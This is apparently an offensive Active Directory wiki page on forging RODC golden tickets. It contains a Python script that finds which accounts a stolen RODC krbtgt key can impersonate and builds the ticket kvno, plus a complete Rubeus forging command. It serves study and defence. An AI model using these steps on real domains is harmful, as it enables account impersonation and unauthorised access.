# RODC Golden tickets

## Theory

With administrative access to an [RODC](/ad/movement/domain-settings/rodc.md), it is possible to dump all the credentials it caches, including those of its `krbtgt_XXXXX` account (the RODC-specific krbtgt account, where `XXXXX` is the RODC's `msDS-SecondaryKrbTgtNumber`). That key can be used to forge an "RODC golden ticket" for any account the RODC is allowed to cache, i.e. an account listed (directly or through group membership) in the RODC's `msDS-RevealOnDemandGroup` attribute and not in its `msDS-NeverRevealGroup` attribute. The forged ticket can then be presented to the RODC, or to any reachable writable (i.e. standard) Domain Controller, to request a Service Ticket (ST). The writable DC checks the target account against that RODC's password replication policy before issuing the ST, so accounts outside the reveal scope (denied accounts such as Domain Admins included) cannot be impersonated this way.

{% hint style="info" %}
When presenting an RODC golden ticket to a writable (i.e. standard) Domain Controller, there is no point in carefully crafting the PAC (group memberships and the like): the writable Domain Controller rebuilds it from the directory when issuing the service ticket (ST).
{% endhint %}
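As an added example (not code from the original page, nor from Rubeus or any other tool it mentions), the following Python script shows the two pre-flight checks a practitioner wants before spending the stolen key: which accounts fall inside the RODC's reveal scope (allow list minus deny list, nested groups followed, deny taking precedence), and how the 32-bit kvno of the forged ticket is built, with the RODC's `msDS-SecondaryKrbTgtNumber` in the upper 16 bits and the key's own version in the lower 16 bits as MS-KILE specifies. The RODC attributes, group memberships and DNs are constructed sample data, and the key version of 1 is an assumption to replace with the real `msDS-KeyVersionNumber` of the `krbtgt_XXXXX` account.

```python
"""RODC golden ticket pre-flight check (example added to this page).
Given the RODC's reveal/never-reveal lists and group membership, decide which
accounts a stolen krbtgt_XXXXX key can be used for, and build the 32-bit kvno
the forged ticket must carry."""

# Constructed sample data: a fictional RODC and a handful of directory objects.
# In a real engagement these come from LDAP (ldapsearch, Get-ADObject, ...).
RODC = {
    "dn": "CN=RODC01,OU=Domain Controllers,DC=domain,DC=local",
    "msDS-SecondaryKrbTgtNumber": 32594,  # i.e. the account is krbtgt_32594
    "msDS-RevealOnDemandGroup": [
        "CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local",
    ],
    "msDS-NeverRevealGroup": [
        "CN=Denied RODC Password Replication Group,CN=Users,DC=domain,DC=local",
        "CN=Domain Admins,CN=Users,DC=domain,DC=local",
    ],
}

# Constructed group membership: group DN -> direct members (users or groups).
GROUPS = {
    "CN=Allowed RODC Password Replication Group,CN=Users,DC=domain,DC=local": [
        "CN=Helpdesk,OU=Groups,DC=domain,DC=local",
        "CN=svc-backup,OU=Service Accounts,DC=domain,DC=local",
    ],
    "CN=Helpdesk,OU=Groups,DC=domain,DC=local": [
        "CN=jdoe,OU=Users,DC=domain,DC=local",
    ],
    "CN=Domain Admins,CN=Users,DC=domain,DC=local": [
        "CN=svc-backup,OU=Service Accounts,DC=domain,DC=local",
    ],
    "CN=Denied RODC Password Replication Group,CN=Users,DC=domain,DC=local": [],
}


def transitive_groups(member_dn, groups=GROUPS):
    """All groups the object belongs to, following nested membership."""
    seen, todo = set(), [member_dn]
    while todo:
        dn = todo.pop()
        for group_dn, members in groups.items():
            if dn in members and group_dn not in seen:
                seen.add(group_dn)
                todo.append(group_dn)
    return seen


def is_revealable(account_dn, rodc=RODC, groups=GROUPS):
    """True if the RODC's password replication policy allows caching the
    account: matched by the allow list and not by the deny list (deny wins).
    Both attributes may hold user DNs directly as well as group DNs."""
    memberships = transitive_groups(account_dn, groups) | {account_dn}
    allowed = bool(memberships & set(rodc["msDS-RevealOnDemandGroup"]))
    denied = bool(memberships & set(rodc["msDS-NeverRevealGroup"]))
    return allowed and not denied


def rodc_kvno(rodc_number, key_version=1):
    """kvno for a ticket encrypted with an RODC krbtgt key: the RODC's
    msDS-SecondaryKrbTgtNumber in the upper 16 bits and the key's own version
    in the lower 16 bits (MS-KILE 3.1.5.8). key_version=1 is an assumption;
    read msDS-KeyVersionNumber of the krbtgt_XXXXX account to be sure."""
    if not 0 < rodc_number < 0x10000 or not 0 <= key_version < 0x10000:
        raise ValueError("both halves of the kvno must fit in 16 bits")
    return (rodc_number << 16) | key_version


def forgeable_targets(candidates, rodc=RODC, groups=GROUPS):
    """Filter candidate DNs down to those a forged ticket would be honoured for."""
    return [dn for dn in candidates if is_revealable(dn, rodc, groups)]


if __name__ == "__main__":
    candidates = [
        "CN=jdoe,OU=Users,DC=domain,DC=local",                   # nested in allow list
        "CN=svc-backup,OU=Service Accounts,DC=domain,DC=local",  # allowed, but Domain Admin
        "CN=bob,OU=Users,DC=domain,DC=local",                    # in neither list
    ]
    for dn in candidates:
        print(f"{dn}: {'forgeable' if is_revealable(dn) else 'not forgeable'}")
    print("kvno for the forged ticket:", hex(rodc_kvno(RODC["msDS-SecondaryKrbTgtNumber"])))
```

Run it as-is to see the three verdicts and the kvno; to use it for real, replace `RODC` and `GROUPS` with the values read from the directory. The kvno helper rejects an RODC number or key version that does not fit in 16 bits, since a malformed kvno is the usual reason a writable DC silently refuses an otherwise correct RODC ticket.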

## Practice

{% tabs %}
{% tab title="UNIX-like" %}
At the time of writing, no tool for UNIX-like systems is available to forge an RODC golden ticket (i.e. a ticket encrypted with the `krbtgt_XXXXX` key and carrying the matching kvno).
{% endtab %}

{% tab title="Windows" %}
From Windows systems, [Rubeus](https://github.com/GhostPack/Rubeus) (C#) can be used for this purpose. `$KRBTGT_NUMBER` is the RODC's `msDS-SecondaryKrbTgtNumber` (the suffix of the `krbtgt_XXXXX` account name, which Rubeus uses to set the ticket's kvno), `$KRBTGT_AES_KEY` is the AES256 key of that account dumped from the RODC, and `USER` must be an account within the RODC's reveal scope.

{% code overflow="wrap" %}

```powershell
Rubeus.exe golden /rodcNumber:$KRBTGT_NUMBER /flags:forwardable,renewable,enc_pa_rep /nowrap /outfile:ticket.kirbi /aes256:$KRBTGT_AES_KEY /user:USER /id:USER_RID /domain:domain.local /sid:DOMAIN_SID
```

{% endcode %}
{% endtab %}
{% endtabs %}

> The secret ingredient for making an RODC golden ticket viable is including the correct key version number in the *kvno* field of the ticket.
>
> *(By Elad Shamir on* [*specterops.io*](https://posts.specterops.io/at-the-edge-of-tier-zero-the-curious-case-of-the-rodc-ef5f1799ca06)*)*

## Resources

{% embed url="https://adsecurity.org/?p=3592" %}

{% embed url="https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/" %}
